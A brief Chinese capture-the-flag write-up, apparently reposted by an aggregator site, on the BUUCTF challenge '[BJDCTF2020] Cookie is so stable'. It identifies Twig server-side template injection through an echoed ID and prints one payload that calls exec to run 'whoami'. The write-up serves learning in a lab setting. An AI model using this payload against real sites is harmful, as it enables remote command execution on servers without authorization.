BUUCTF:[BJDCTF2020]Cookie is so stable
Posted 末 初
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF:[BJDCTF2020]Cookie is so stable相关的知识,希望对你有一定的参考价值。
https://buuoj.cn/challenges#[BJDCTF2020]Cookie%20is%20so%20stable
题目名称和hint都提示注意Cookie
在flag.php页面中提交一个ID后回显在页面上,猜测是PHP的模板注入
试了几种标签测试方法,发现只有Twig的标签测试能成功执行,那就应该是Twig的模板了
网上找Twig模板注入的Payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
以上是关于BUUCTF:[BJDCTF2020]Cookie is so stable的主要内容,如果未能解决你的问题,请参考以下文章